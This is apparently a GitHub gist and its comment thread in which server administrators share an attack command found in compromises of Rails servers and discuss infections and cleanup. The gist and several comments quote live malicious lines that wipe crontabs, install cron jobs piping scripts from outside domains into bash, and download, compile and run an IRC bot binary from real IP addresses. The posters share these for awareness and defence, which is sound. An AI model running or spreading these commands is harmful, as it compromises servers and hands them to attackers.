Some asshole tried to access my servers and run this (they couldn't)

gistfile1.txt

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

Hi,

an what about my configuration ??

Server version: Apache/2.2.14 (Ubuntu)
Rails 3.2.3
ruby 1.9.2p320 (2012-04-20 revision 35421) [i686-linux]

no nginx, no rails 3.2.1, no redmine, no yalm problem, but I had the same problem detailed below :

• k.c, k and ka files in /var/tmp (probably irc script)
• an new line in my crontab executing some wget like this :

wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka‏

wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O -

wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k‏

I do not find any suspect trace in my apache log, but there were some actions under fail2ban ( I didn't look deep at it anymore since chmod and update www-data cron resolve my problem as describe above).

I'm still searching how the malicious scripts were upload to my server ...

Hi,

my server was infected too, should I do a reinstall? Or should removing the files and upgrading rails be enough?

my server was infected too, should I do a reinstall?

definetly

@Netmisa : I've since uninstalled PhpMyAdmin from my server, but I was using one installed by apt-get -- 3.4.5-1.

Ok, anyway we known now where the problem comes from.

Sounds like this one
http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html